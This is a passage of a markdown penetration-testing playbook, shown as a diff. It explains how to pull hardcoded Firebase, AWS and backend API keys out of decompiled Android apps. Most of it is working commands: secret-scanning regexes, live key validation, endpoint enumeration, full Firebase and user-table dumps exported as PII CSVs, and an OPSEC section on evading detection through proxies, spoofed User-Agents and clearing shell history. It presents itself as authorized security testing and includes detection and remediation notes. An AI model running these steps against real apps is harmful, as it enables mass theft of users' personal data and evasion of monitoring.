|
284
|
+
### Step 4 — Automated Secret Scanning
|
|
285
|
+
|
|
286
|
+
Run automated scanners across both the decoded APK and decompiled Java source.
|
|
287
|
+
|
|
288
|
+
```bash
|
|
289
|
+
# Run trufflehog against the decompiled source directory
|
|
290
|
+
trufflehog filesystem ./targetapp_java/ --json | jq '.'
|
|
291
|
+
|
|
292
|
+
# Run gitleaks on the decoded APK directory
|
|
293
|
+
gitleaks detect --source ./targetapp_decoded/ \
|
|
294
|
+
--report-format json \
|
|
295
|
+
--report-path secrets_decoded.json \
|
|
296
|
+
--no-git
|
|
297
|
+
|
|
298
|
+
# Run gitleaks on the jadx Java output
|
|
299
|
+
gitleaks detect --source ./targetapp_java/ \
|
|
300
|
+
--report-format json \
|
|
301
|
+
--report-path secrets_java.json \
|
|
302
|
+
--no-git
|
|
303
|
+
|
|
304
|
+
# View findings
|
|
305
|
+
cat secrets_java.json | jq '.[] | {RuleID, File, Secret, StartLine}'
|
|
306
|
+
```
|
|
307
|
+
|
|
308
|
+
**Expected Output (example):**
|
|
309
|
+
```json
|
|
310
|
+
{
|
|
311
|
+
"RuleID": "firebase-api-key",
|
|
312
|
+
"File": "sources/com/targetapp/android/BuildConfig.java",
|
|
313
|
+
"Secret": "AIzaSyD-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
|
|
314
|
+
"StartLine": 12
|
|
315
|
+
}
|
|
316
|
+
{
|
|
317
|
+
"RuleID": "generic-api-key",
|
|
318
|
+
"File": "sources/com/targetapp/android/network/ApiClient.java",
|
|
319
|
+
"Secret": "sk_live_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
|
|
320
|
+
"StartLine": 34
|
|
321
|
+
}
|
|
322
|
+
```
|
|
323
|
+
|
|
324
|
+
**Fallback:** If automated scanners miss findings, run targeted ripgrep patterns (Step 5).
|
|
325
|
+
|
|
326
|
+
---
|
|
327
|
+
|
|
328
|
+
### Step 5 — Manual Source Review with Targeted Pattern Matching
|
|
329
|
+
|
|
330
|
+
Automated scanners miss custom key formats. Supplement with targeted searches.
|
|
331
|
+
|
|
332
|
+
```bash
|
|
333
|
+
# ── Firebase / Google ──────────────────────────────────────────────
|
|
334
|
+
# Firebase API key pattern: AIza[0-9A-Za-z-_]{35}
|
|
335
|
+
rg "AIza[0-9A-Za-z\-_]{35}" ./targetapp_java/ ./targetapp_decoded/
|
|
336
|
+
|
|
337
|
+
# Google OAuth client ID
|
|
338
|
+
rg "[0-9]+-[a-z0-9]+\.apps\.googleusercontent\.com" ./targetapp_java/
|
|
339
|
+
|
|
340
|
+
# Firebase project config (often in google-services.json)
|
|
341
|
+
find ./targetapp_decoded/ -name "google-services.json" -exec cat {} \;
|
|
342
|
+
|
|
343
|
+
# ── AWS ────────────────────────────────────────────────────────────
|
|
344
|
+
# AWS Access Key ID: AKIA[0-9A-Z]{16}
|
|
345
|
+
rg "AKIA[0-9A-Z]{16}" ./targetapp_java/ ./targetapp_decoded/
|
|
346
|
+
|
|
347
|
+
# AWS Secret Access Key (40-char base64 after the AKIA key)
|
|
348
|
+
rg "(?i)(aws_secret|secret_access_key|secretkey).{0,30}[A-Za-z0-9/+]{40}" ./targetapp_java/
|
|
349
|
+
|
|
350
|
+
# ── Generic API Keys and Tokens ───────────────────────────────────
|
|
351
|
+
# Bearer tokens, generic API keys
|
|
352
|
+
rg "(?i)(api[_\-]?key|apikey|access[_\-]?token|auth[_\-]?token|secret[_\-]?key|private[_\-]?key).{0,10}['\"][A-Za-z0-9\-_]{20,}" ./targetapp_java/
|
|
353
|
+
|
|
354
|
+
# Bearer token assignments
|
|
355
|
+
rg "(?i)Bearer\s+[A-Za-z0-9\-_.]{20,}" ./targetapp_java/
|
|
356
|
+
|
|
357
|
+
# ── Stripe ─────────────────────────────────────────────────────────
|
|
358
|
+
rg "sk_live_[0-9a-zA-Z]{24}" ./targetapp_java/
|
|
359
|
+
rg "rk_live_[0-9a-zA-Z]{24}" ./targetapp_java/
|
|
360
|
+
|
|
361
|
+
# ── Twilio ─────────────────────────────────────────────────────────
|
|
362
|
+
rg "AC[a-zA-Z0-9]{32}" ./targetapp_java/ # Account SID
|
|
363
|
+
rg "SK[a-zA-Z0-9]{32}" ./targetapp_java/ # API key SID
|
|
364
|
+
|
|
365
|
+
# ── Hardcoded URLs with embedded credentials ───────────────────────
|
|
366
|
+
rg "https?://[a-zA-Z0-9_\-]+:[a-zA-Z0-9_\-]+@" ./targetapp_java/
|
|
367
|
+
|
|
368
|
+
# ── BuildConfig.java — highest priority target ────────────────────
|
|
369
|
+
find ./targetapp_java/ -name "BuildConfig.java" -exec cat {} \;
|
|
370
|
+
|
|
371
|
+
# ── strings.xml — common key storage ─────────────────────────────
|
|
372
|
+
cat ./targetapp_decoded/res/values/strings.xml | grep -iE "key|token|secret|api|auth|password|credential"
|
|
373
|
+
|
|
374
|
+
# ── Raw assets directory ──────────────────────────────────────────
|
|
375
|
+
find ./targetapp_decoded/assets/ -type f | xargs file
|
|
376
|
+
find ./targetapp_decoded/assets/ -name "*.json" -exec cat {} \;
|
|
377
|
+
find ./targetapp_decoded/assets/ -name "*.xml" -exec cat {} \;
|
|
378
|
+
find ./targetapp_decoded/assets/ -name "*.pem" -exec cat {} \;
|
|
379
|
+
find ./targetapp_decoded/assets/ -name "*.p12" -exec cat {} \;
|
|
380
|
+
|
|
381
|
+
# ── Native libraries — strings embedded in .so files ─────────────
|
|
382
|
+
find ./targetapp_decoded/lib/ -name "*.so" -exec strings {} \; | \
|
|
383
|
+
grep -iE "AIza|AKIA|sk_live|Bearer|api_key|secret"
|
|
384
|
+
```
|
|
385
|
+
|
|
386
|
+
**Expected Output (BuildConfig.java example):**
|
|
387
|
+
```java
|
|
388
|
+
public final class BuildConfig {
|
|
389
|
+
public static final boolean DEBUG = Boolean.parseBoolean("false");
|
|
390
|
+
public static final String APPLICATION_ID = "com.targetapp.android";
|
|
391
|
+
public static final String BUILD_TYPE = "release";
|
|
392
|
+
public static final String FIREBASE_API_KEY = "AIzaSyD-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
|
|
393
|
+
public static final String FIREBASE_PROJECT_ID = "targetapp-prod";
|
|
394
|
+
public static final String BACKEND_API_KEY = "ba_prod_AbCdEfGhIjKlMnOpQrStUvWx";
|
|
395
|
+
public static final String BACKEND_BASE_URL = "https://api.targetapp.com/v2/";
|
|
396
|
+
}
|
|
397
|
+
```
|
|
398
|
+
|
|
399
|
+
**Fallback:** If BuildConfig.java is not present, search smali directly:
|
|
400
|
+
```bash
|
|
401
|
+
grep -r "FIREBASE_API_KEY\|BACKEND_API_KEY\|API_KEY" ./targetapp_decoded/smali/ | \
|
|
402
|
+
grep "const-string"
|
|
403
|
+
```
|
|
404
|
+
|
|
405
|
+
---
|
|
406
|
+
|
|
407
|
+
### Step 6 — API Key Identification and Classification
|
|
408
|
+
|
|
409
|
+
Triage discovered keys by service type and potential impact.
|
|
410
|
+
|
|
411
|
+
```bash
|
|
412
|
+
# ── Identify Firebase key and associated project ──────────────────
|
|
413
|
+
# Firebase API keys follow the format: AIzaSy[A-Za-z0-9_-]{33}
|
|
414
|
+
# The key alone enables client SDK operations; the project ID is needed for REST API
|
|
415
|
+
|
|
416
|
+
# Extract project details from google-services.json if present
|
|
417
|
+
cat targetapp_decoded/assets/google-services.json | jq '{
|
|
418
|
+
project_id: .project_info.project_id,
|
|
419
|
+
project_number: .project_info.project_number,
|
|
420
|
+
firebase_url: .project_info.firebase_url,
|
|
421
|
+
storage_bucket: .project_info.storage_bucket,
|
|
422
|
+
api_key: .client[0].api_key[0].current_key
|
|
423
|
+
}'
|
|
424
|
+
|
|
425
|
+
# ── Validate what services are enabled for the Firebase API key ───
|
|
426
|
+
# Firebase API key validation endpoint
|
|
427
|
+
curl -s "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getProjectConfig?key=AIzaSyD-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" | jq '.'
|
|
428
|
+
|
|
429
|
+
# ── Identify AWS key scope ─────────────────────────────────────────
|
|
430
|
+
# Use awscli with discovered credentials
|
|
431
|
+
export AWS_ACCESS_KEY_ID="AKIAIOSFODNN7EXAMPLE"
|
|
432
|
+
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
|
|
433
|
+
|
|
434
|
+
# Who am I?
|
|
435
|
+
aws sts get-caller-identity
|
|
436
|
+
|
|
437
|
+
# What policies are attached?
|
|
438
|
+
aws iam list-attached-user-policies --user-name $(aws sts get-caller-identity --query UserId --output text)
|
|
439
|
+
|
|
440
|
+
# ── Classify custom backend API key impact ────────────────────────
|
|
441
|
+
# Send a request with the discovered key and examine the response
|
|
442
|
+
curl -s "https://api.targetapp.com/v2/users" \
|
|
443
|
+
-H "X-API-Key: ba_prod_AbCdEfGhIjKlMnOpQrStUvWx" | jq '.'
|
|
444
|
+
|
|
445
|
+
# Check what endpoints the key grants access to
|
|
446
|
+
curl -s "https://api.targetapp.com/v2/admin/users" \
|
|
447
|
+
-H "Authorization: Bearer ba_prod_AbCdEfGhIjKlMnOpQrStUvWx" | jq '.'
|
|
448
|
+
```
|
|
449
|
+
|
|
450
|
+
**Expected Output (Firebase getProjectConfig):**
|
|
451
|
+
```json
|
|
452
|
+
{
|
|
453
|
+
"projectId": "targetapp-prod",
|
|
454
|
+
"signInOptions": ["password", "phone", "google.com"],
|
|
455
|
+
"authorizedDomains": ["targetapp.com", "localhost"]
|
|
456
|
+
}
|
|
457
|
+
```
|
|
458
|
+
|
|
459
|
+
---
|
|
460
|
+
|
|
461
|
+
### Step 7 — Key Validation and Scope Enumeration
|
|
462
|
+
|
|
463
|
+
Test the discovered keys against live APIs to confirm validity and determine access scope.
|
|
464
|
+
|
|
465
|
+
**Firebase Key Validation:**
|
|
466
|
+
|
|
467
|
+
```bash
|
|
468
|
+
FIREBASE_KEY="AIzaSyD-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
|
469
|
+
FIREBASE_PROJECT="targetapp-prod"
|
|
470
|
+
|
|
471
|
+
# ── Test 1: Attempt anonymous sign-in (does not require valid user) ──
|
|
472
|
+
curl -s -X POST \
|
|
473
|
+
"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=${FIREBASE_KEY}" \
|
|
474
|
+
-H "Content-Type: application/json" \
|
|
475
|
+
-d '{"returnSecureToken": true}' | jq '{kind, idToken, refreshToken, expiresIn}'
|
|
476
|
+
|
|
477
|
+
# ── Test 2: List Firebase Realtime Database contents (no auth) ──────
|
|
478
|
+
# If database rules allow unauthenticated reads:
|
|
479
|
+
curl -s "https://${FIREBASE_PROJECT}-default-rtdb.firebaseio.com/.json?print=pretty"
|
|
480
|
+
|
|
481
|
+
# ── Test 3: List Firestore collections via REST API ──────────────────
|
|
482
|
+
# With anonymous ID token from Test 1:
|
|
483
|
+
ID_TOKEN="<idToken from Test 1>"
|
|
484
|
+
curl -s \
|
|
485
|
+
"https://firestore.googleapis.com/v1/projects/${FIREBASE_PROJECT}/databases/(default)/documents" \
|
|
486
|
+
-H "Authorization: Bearer ${ID_TOKEN}" | jq '.documents[].name'
|
|
487
|
+
|
|
488
|
+
# ── Test 4: Access Firebase Storage ─────────────────────────────────
|
|
489
|
+
curl -s \
|
|
490
|
+
"https://storage.googleapis.com/storage/v1/b/${FIREBASE_PROJECT}.appspot.com/o" \
|
|
491
|
+
-H "Authorization: Bearer ${ID_TOKEN}" | jq '.items[].name'
|
|
492
|
+
|
|
493
|
+
# ── Test 5: Enumerate registered email accounts ──────────────────────
|
|
494
|
+
# Check if account enumeration is enabled (reveals registered users)
|
|
495
|
+
curl -s -X POST \
|
|
496
|
+
"https://identitytoolkit.googleapis.com/v1/accounts:createAuthUri?key=${FIREBASE_KEY}" \
|
|
497
|
+
-H "Content-Type: application/json" \
|
|
498
|
+
-d '{"identifier": "admin@targetapp.com", "continueUri": "https://targetapp.com"}' \
|
|
499
|
+
| jq '{registered}'
|
|
500
|
+
```
|
|
501
|
+
|
|
502
|
+
**Custom Backend API Key Validation:**
|
|
503
|
+
|
|
504
|
+
```bash
|
|
505
|
+
API_KEY="ba_prod_AbCdEfGhIjKlMnOpQrStUvWx"
|
|
506
|
+
BASE_URL="https://api.targetapp.com/v2"
|
|
507
|
+
|
|
508
|
+
# Test key validity
|
|
509
|
+
curl -s "${BASE_URL}/health" -H "X-API-Key: ${API_KEY}" -o /dev/null -w "%{http_code}"
|
|
510
|
+
# 200 = valid key
|
|
511
|
+
|
|
512
|
+
# Enumerate accessible endpoints
|
|
513
|
+
for endpoint in users admin/users orders payments reports config; do
|
|
514
|
+
STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
|
|
515
|
+
"${BASE_URL}/${endpoint}" -H "X-API-Key: ${API_KEY}")
|
|
516
|
+
echo "${STATUS} → ${BASE_URL}/${endpoint}"
|
|
517
|
+
done
|
|
518
|
+
|
|
519
|
+
# Attempt to read all users (admin-level endpoint)
|
|
520
|
+
curl -s "${BASE_URL}/admin/users?limit=100" \
|
|
521
|
+
-H "X-API-Key: ${API_KEY}" | jq '.users[] | {id, email, role}'
|
|
522
|
+
```
|
|
523
|
+
|
|
524
|
+
**Expected Output:**
|
|
525
|
+
```
|
|
526
|
+
200 → https://api.targetapp.com/v2/users
|
|
527
|
+
200 → https://api.targetapp.com/v2/admin/users
|
|
528
|
+
200 → https://api.targetapp.com/v2/orders
|
|
529
|
+
403 → https://api.targetapp.com/v2/payments
|
|
530
|
+
200 → https://api.targetapp.com/v2/reports
|
|
531
|
+
```
|
|
532
|
+
|
|
533
|
+
**Fallback:** If API key is rate-limited or rejected, check if the key is passed differently (query param, cookie, custom header):
|
|
534
|
+
```bash
|
|
535
|
+
# Try common API key delivery methods
|
|
536
|
+
curl -s "${BASE_URL}/users?api_key=${API_KEY}"
|
|
537
|
+
curl -s "${BASE_URL}/users?apikey=${API_KEY}"
|
|
538
|
+
curl -s "${BASE_URL}/users" -H "API-Key: ${API_KEY}"
|
|
539
|
+
curl -s "${BASE_URL}/users" -H "Authorization: ApiKey ${API_KEY}"
|
|
540
|
+
```
|
|
541
|
+
|
|
542
|
+
---
|
|
543
|
+
|
|
544
|
+
### Step 8 — Backend Access and Data Extraction
|
|
545
|
+
|
|
546
|
+
With a validated, scoped key, access the backend and extract data relevant to the engagement.
|
|
547
|
+
|
|
548
|
+
**Firebase Realtime Database Full Dump:**
|
|
549
|
+
|
|
550
|
+
```bash
|
|
551
|
+
FIREBASE_PROJECT="targetapp-prod"
|
|
552
|
+
ID_TOKEN="<idToken from Step 7>"
|
|
553
|
+
|
|
554
|
+
# ── Full database dump (if rules permit) ────────────────────────────
|
|
555
|
+
curl -s \
|
|
556
|
+
"https://${FIREBASE_PROJECT}-default-rtdb.firebaseio.com/.json?auth=${ID_TOKEN}&print=pretty" \
|
|
557
|
+
-o firebase_dump.json
|
|
558
|
+
|
|
559
|
+
# ── Targeted user data extraction ───────────────────────────────────
|
|
560
|
+
curl -s \
|
|
561
|
+
"https://${FIREBASE_PROJECT}-default-rtdb.firebaseio.com/users.json?auth=${ID_TOKEN}&print=pretty" \
|
|
562
|
+
| jq 'to_entries[] | {uid: .key, email: .value.email, role: .value.role}'
|
|
563
|
+
|
|
564
|
+
# ── Firestore collection dump ────────────────────────────────────────
|
|
565
|
+
# List all documents in the users collection
|
|
566
|
+
curl -s \
|
|
567
|
+
"https://firestore.googleapis.com/v1/projects/${FIREBASE_PROJECT}/databases/(default)/documents/users" \
|
|
568
|
+
-H "Authorization: Bearer ${ID_TOKEN}" \
|
|
569
|
+
| jq '.documents[] | {name: .name, fields: .fields}'
|
|
570
|
+
|
|
571
|
+
# ── Firebase Storage file listing ───────────────────────────────────
|
|
572
|
+
curl -s \
|
|
573
|
+
"https://storage.googleapis.com/storage/v1/b/${FIREBASE_PROJECT}.appspot.com/o?maxResults=100" \
|
|
574
|
+
-H "Authorization: Bearer ${ID_TOKEN}" \
|
|
575
|
+
| jq '.items[] | {name, size, contentType, timeCreated}'
|
|
576
|
+
|
|
577
|
+
# ── Download a specific file from Firebase Storage ──────────────────
|
|
578
|
+
FILE_NAME="exports/user_data_2024.csv"
|
|
579
|
+
ENCODED_NAME=$(python3 -c "import urllib.parse; print(urllib.parse.quote('${FILE_NAME}', safe=''))")
|
|
580
|
+
curl -s \
|
|
581
|
+
"https://storage.googleapis.com/storage/v1/b/${FIREBASE_PROJECT}.appspot.com/o/${ENCODED_NAME}?alt=media" \
|
|
582
|
+
-H "Authorization: Bearer ${ID_TOKEN}" \
|
|
583
|
+
-o downloaded_file.csv
|
|
584
|
+
```
|
|
585
|
+
|
|
586
|
+
**Custom Backend — Full User Table Access:**
|
|
587
|
+
|
|
588
|
+
```bash
|
|
589
|
+
API_KEY="ba_prod_AbCdEfGhIjKlMnOpQrStUvWx"
|
|
590
|
+
BASE_URL="https://api.targetapp.com/v2"
|
|
591
|
+
|
|
592
|
+
# Paginated user dump
|
|
593
|
+
PAGE=1
|
|
594
|
+
while true; do
|
|
595
|
+
RESPONSE=$(curl -s "${BASE_URL}/admin/users?page=${PAGE}&limit=100" \
|
|
596
|
+
-H "X-API-Key: ${API_KEY}")
|
|
597
|
+
COUNT=$(echo "${RESPONSE}" | jq '.users | length')
|
|
598
|
+
echo "${RESPONSE}" | jq '.users[]' >> all_users.jsonl
|
|
599
|
+
[ "${COUNT}" -lt 100 ] && break
|
|
600
|
+
PAGE=$((PAGE + 1))
|
|
601
|
+
done
|
|
602
|
+
|
|
603
|
+
echo "Total users extracted: $(wc -l < all_users.jsonl)"
|
|
604
|
+
|
|
605
|
+
# Extract specific PII fields for the findings report
|
|
606
|
+
cat all_users.jsonl | jq -r '[.id, .email, .phone, .role, .created_at] | @csv' \
|
|
607
|
+
> users_export.csv
|
|
608
|
+
```
|
|
609
|
+
|
|
610
|
+
**Expected Output (Firebase database dump excerpt):**
|
|
611
|
+
```json
|
|
612
|
+
{
|
|
613
|
+
"users": {
|
|
614
|
+
"uid_AbCdEf": {
|
|
615
|
+
"email": "alice@example.com",
|
|
616
|
+
"displayName": "Alice Smith",
|
|
617
|
+
"role": "admin",
|
|
618
|
+
"createdAt": "2023-08-14T10:22:31Z"
|
|
619
|
+
},
|
|
620
|
+
"uid_GhIjKl": {
|
|
621
|
+
"email": "bob@example.com",
|
|
622
|
+
"displayName": "Bob Jones",
|
|
623
|
+
"role": "user",
|
|
624
|
+
"createdAt": "2024-01-05T08:14:02Z"
|
|
625
|
+
}
|
|
626
|
+
}
|
|
627
|
+
}
|
|
628
|
+
```
|
|
629
|
+
|
|
630
|
+
---
|
|
631
|
+
|
|
632
|
+
## Real-World Reference
|
|
633
|
+
|
|
634
|
+
**Scenario: Firebase API Key in BuildConfig.java → Full User Database Read**
|
|
635
|
+
|
|
636
|
+
1. The target company published `com.targetapp.android` on the Google Play Store.
|
|
637
|
+
2. APK pulled with `apkeep` and decompiled with `jadx` in under 10 minutes.
|
|
638
|
+
3. `BuildConfig.java` contained:
|
|
639
|
+
```java
|
|
640
|
+
public static final String FIREBASE_API_KEY = "AIzaSyD-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
|
|
641
|
+
public static final String FIREBASE_PROJECT_ID = "targetapp-prod";
|
|
642
|
+
```
|
|
643
|
+
4. The Firebase key was used to call the Identity Toolkit API and obtain an anonymous ID token.
|
|
644
|
+
5. Firebase Realtime Database security rules were set to `".read": "auth != null"` — any authenticated session, including anonymous, was granted read access to the entire database.
|
|
645
|
+
6. A single REST call to `https://targetapp-prod-default-rtdb.firebaseio.com/.json?auth=<token>` returned the full database: 250,000 user records including email addresses, phone numbers, and order history.
|
|
646
|
+
7. No write access was confirmed, but the key also granted access to Firebase Storage — internal CSV exports were readable.
|
|
647
|
+
|
|
648
|
+
**Why this happens:**
|
|
649
|
+
- Firebase API keys are intended to identify the project, not authenticate users — but when combined with weak security rules, the key alone is sufficient for full data access.
|
|
650
|
+
- Developers embed keys in `BuildConfig.java` because Firebase documentation encourages it, without adequately warning about security rule implications.
|
|
651
|
+
- Apps compiled in release mode with `proguard` still expose `BuildConfig` values in cleartext — obfuscation does not protect constants.
|
|
652
|
+
|
|
653
|
+
**Known Real-World Cases:**
|
|
654
|
+
- Appknox research (2020): 14,000+ Android apps found to expose Firebase databases due to misconfigured rules and hardcoded keys
|
|
655
|
+
- Avast threat research (2021): Firebase database exposure in fintech apps allowing access to financial records
|
|
656
|
+
- HackerOne public disclosures: Multiple bug bounty reports for Firebase key + open rules leading to critical data exposure
|
|
657
|
+
|
|
658
|
+
---
|
|
659
|
+
|
|
660
|
+
## MITRE ATT&CK Mapping
|
|
661
|
+
|
|
662
|
+
| Step | Tactic | Technique | Sub-technique | Description |
|
|
663
|
+
|------|--------|-----------|---------------|-------------|
|
|
664
|
+
| 1 — APK Acquisition | Reconnaissance | T1593 | T1593.001 — Social Media / App Stores | Collecting target APK from public distribution channels |
|
|
665
|
+
| 2 — APK Unpacking | Collection | T1005 | — | Collecting data from local system (the APK file itself) |
|
|
666
|
+
| 3 — Java Decompilation | Discovery | T1083 | — | File and Directory Discovery — navigating decompiled source structure |
|
|
667
|
+
| 4–5 — Secret Scanning | Credential Access | T1552 | T1552.007 — Credentials in Files: Mobile | Extracting secrets from application binary and source code |
|
|
668
|
+
| 6 — Key Classification | Discovery | T1526 | — | Cloud Service Discovery — identifying what backend services the keys access |
|
|
669
|
+
| 7 — Key Validation | Initial Access | T1078 | T1078.004 — Cloud Accounts | Using valid cloud service API credentials for initial access |
|
|
670
|
+
| 8 — Data Extraction | Collection | T1530 | — | Data from Cloud Storage Object | Reading user records from Firebase/cloud backend using valid credentials |
|
|
671
|
+
|
|
672
|
+
---
|
|
673
|
+
|
|
674
|
+
## Detection & OPSEC
|
|
675
|
+
|
|
676
|
+
### How This Attack Is Detected
|
|
677
|
+
|
|
678
|
+
- **APK download:** Indistinguishable from a normal user downloading the app — not detectable at the application layer
|
|
679
|
+
- **Decompilation:** Entirely offline — no network traffic generated against the target
|
|
680
|
+
- **Firebase API calls:** Firebase project logs (Google Cloud Console → Firebase Console → Usage) show API key usage by IP and operation type; unusual anonymous sign-in volume or bulk reads from non-mobile IPs may trigger review
|
|
681
|
+
- **Custom backend API calls:** Server access logs record the IP and key used; anomalous call patterns (high frequency, non-mobile User-Agent, enumeration of sequential IDs) may trigger WAF or SIEM alerts
|
|
682
|
+
- **Data exfiltration:** Large responses from database REST endpoints may be flagged by DLP solutions or anomaly-based SIEM rules if baseline traffic is well-established
|
|
683
|
+
|
|
684
|
+
### How to Reduce Detection Risk (Authorized Engagements)
|
|
685
|
+
|
|
686
|
+
```bash
|
|
687
|
+
# ── Use a realistic mobile User-Agent when calling Firebase / backend APIs ──
|
|
688
|
+
curl -s "${BASE_URL}/users" \
|
|
689
|
+
-H "X-API-Key: ${API_KEY}" \
|
|
690
|
+
-H "User-Agent: Dalvik/2.1.0 (Linux; U; Android 13; Pixel 7 Build/TQ3A.230901.001)"
|
|
691
|
+
|
|
692
|
+
# ── Rate-limit API calls to avoid triggering anomaly detection ────────
|
|
693
|
+
# Add a delay between requests
|
|
694
|
+
for endpoint in users orders reports; do
|
|
695
|
+
curl -s "${BASE_URL}/${endpoint}" -H "X-API-Key: ${API_KEY}" >> output.jsonl
|
|
696
|
+
sleep 2
|
|
697
|
+
done
|
|
698
|
+
|
|
699
|
+
# ── Route traffic through a residential or mobile proxy ──────────────
|
|
700
|
+
curl -s "${BASE_URL}/users" \
|
|
701
|
+
-H "X-API-Key: ${API_KEY}" \
|
|
702
|
+
--proxy "socks5://mobile-proxy.example.com:1080"
|
|
703
|
+
|
|
704
|
+
# ── Paginate data extraction — avoid bulk full-database reads ─────────
|
|
705
|
+
# Read 10 records at a time, not 10,000
|
|
706
|
+
curl -s "https://${FIREBASE_PROJECT}-rtdb.firebaseio.com/users.json?auth=${ID_TOKEN}&limitToFirst=10&orderBy=%22%24key%22"
|
|
707
|
+
|
|
708
|
+
# ── Do not create accounts or write data unless explicitly in scope ───
|
|
709
|
+
# Creating test Firebase accounts leaves permanent records
|
|
710
|
+
# Confirm data write actions with the client before executing
|
|
711
|
+
|
|
712
|
+
# ── Confirm Firebase project before bulk reads ────────────────────────
|
|
713
|
+
# Validate the project ID matches the target before querying
|
|
714
|
+
echo "Project: $(curl -s 'https://www.googleapis.com/identitytoolkit/v3/relyingparty/getProjectConfig?key='${FIREBASE_KEY} | jq -r '.projectId')"
|
|
715
|
+
```
|
|
716
|
+
|
|
717
|
+
### Artifacts Left Behind
|
|
718
|
+
|
|
719
|
+
| Artifact | Location | Notes |
|
|
720
|
+
|----------|----------|-------|
|
|
721
|
+
| Firebase API key usage logs | Google Cloud Console → APIs & Services → Credentials | Logs all API calls per key with timestamp and IP |
|
|
722
|
+
| Firebase Auth sign-in events | Firebase Console → Authentication → Users | Anonymous sign-in creates a user record |
|
|
723
|
+
| Firebase Realtime DB access logs | Google Cloud Console → Logging → Firebase Realtime Database | Read/write operations logged with UID |
|
|
724
|
+
| Firestore audit logs | Google Cloud Console → Logging → Cloud Firestore | Document reads logged if audit logging enabled |
|
|
725
|
+
| Backend server access logs | Server-side: nginx/apache logs, CloudWatch, Datadog | IP, timestamp, endpoint, API key used |
|
|
726
|
+
| Local extracted APK directory | Attacker: `./targetapp_decoded/`, `./targetapp_java/` | Full decompiled source — contains all findings |
|
|
727
|
+
| Local dump files | Attacker: `firebase_dump.json`, `all_users.jsonl`, `users_export.csv` | Extracted data — handle per engagement data handling policy |
|
|
728
|
+
| Anonymous Firebase user | Firebase Auth user list | Created by anonymous sign-in in Step 7 |
|
|
729
|
+
|
|
730
|
+
---
|
|
731
|
+
|
|
732
|
+
## Cleanup
|
|
733
|
+
|
|
734
|
+
Steps to remove artifacts after an authorized engagement:
|
|
735
|
+
|
|
736
|
+
```bash
|
|
737
|
+
# 1. Remove local APK and decompiled source directories
|
|
738
|
+
rm -rf ./targetapp.apk ./targetapp_decoded/ ./targetapp_java/ ./apks/
|
|
739
|
+
|
|
740
|
+
# 2. Remove all extracted data files
|
|
741
|
+
rm -f firebase_dump.json all_users.jsonl users_export.csv secrets_decoded.json \
|
|
742
|
+
secrets_java.json hashes.txt downloaded_file.csv output.jsonl
|
|
743
|
+
|
|
744
|
+
# 3. Remove gitleaks and trufflehog output reports
|
|
745
|
+
rm -f secrets_decoded.json secrets_java.json
|
|
746
|
+
|
|
747
|
+
# 4. Clear ADB device authorization (if device was connected)
|
|
748
|
+
adb kill-server
|
|
749
|
+
# Remove ~/.android/adbkey and ~/.android/adbkey.pub if generated during engagement
|
|
750
|
+
rm -f ~/.android/adbkey ~/.android/adbkey.pub
|
|
751
|
+
|
|
752
|
+
# 5. Remove anonymous Firebase Auth account created during key validation
|
|
753
|
+
# — Do this via the Firebase Console or Firebase Admin SDK:
|
|
754
|
+
firebase auth:delete <anonymous-uid> --project targetapp-prod
|
|
755
|
+
# Or via Admin SDK:
|
|
756
|
+
# node -e "require('firebase-admin').auth().deleteUser('<uid>').then(() => process.exit(0))"
|
|
757
|
+
|
|
758
|
+
# 6. Revoke any temporary credentials or sessions created during testing
|
|
759
|
+
# — For Firebase: the anonymous ID token expires in 1 hour automatically
|
|
760
|
+
# — For custom APIs: report all keys used to the client for rotation
|
|
761
|
+
|
|
762
|
+
# 7. Clear shell history
|
|
763
|
+
history -c && history -w
|
|
764
|
+
|
|
765
|
+
# 8. Coordinate with the client to:
|
|
766
|
+
# a. Rotate the exposed API key immediately (Firebase: generate a new key and restrict the old one)
|
|
767
|
+
# b. Review and harden Firebase security rules
|
|
768
|
+
# c. Review server-side access logs for the engagement timeframe
|
|
769
|
+
# d. Confirm no unauthorized access occurred during the testing window
|
|
770
|
+
```
|
|
771
|
+
|
|
772
|
+
---
|
|
773
|
+
|
|
774
|
+
## References
|
|
775
|
+
|
|
776
|
+
| Resource | URL |
|
|
777
|
+
|----------|-----|
|
|
778
|
+
| jadx — Java decompiler | https://github.com/skylot/jadx |
|
|
779
|
+
| apktool — APK decoder | https://ibotpeaches.github.io/Apktool/ |
|
|
780
|
+
| apkeep — APK downloader | https://github.com/EFForg/apkeep |
|
|
781
|
+
| gplaycli — Google Play downloader | https://github.com/matlink/gplaycli |
|
|
782
|
+
| gitleaks — secret scanner | https://github.com/gitleaks/gitleaks |
|
|
783
|
+
| trufflehog — secret scanner | https://github.com/trufflesecurity/trufflehog |
|
|
784
|
+
| Firebase REST API reference | https://firebase.google.com/docs/reference/rest/database |
|
|
785
|
+
| Firebase security rules guide | https://firebase.google.com/docs/rules |
|
|
786
|
+
| Firebase project config endpoint | https://firebase.google.com/docs/projects/api/reference/rest |
|
|
787
|
+
| Google Identity Toolkit API | https://firebase.google.com/docs/reference/rest/auth |
|
|
788
|
+
| OWASP Mobile Top 10 — M9: Insecure Data Storage | https://owasp.org/www-project-mobile-top-10/ |
|
|
789
|
+
| OWASP Mobile Testing Guide — Credential Storage | https://mas.owasp.org/MASTG/tests/android/MASVS-STORAGE/ |
|
|
790
|
+
| MITRE T1552.007 — Credentials in Files: Mobile | https://attack.mitre.org/techniques/T1552/007/ |
|
|
791
|
+
| MITRE T1078 — Valid Accounts | https://attack.mitre.org/techniques/T1078/ |
|
|
792
|
+
| MITRE T1530 — Data from Cloud Storage | https://attack.mitre.org/techniques/T1530/ |
|
|
793
|
+
| Appknox Firebase exposure research | https://appknox.com/blog/firebase-database-security |
|
|
794
|
+
| Firebase exposed databases — Avast research | https://decoded.avast.io/lukaslacina/firebase-misconfiguration/ |
|
|
795
|
+
| Android BuildConfig security implications | https://developer.android.com/build/gradle-tips |
|
|
796
|
+
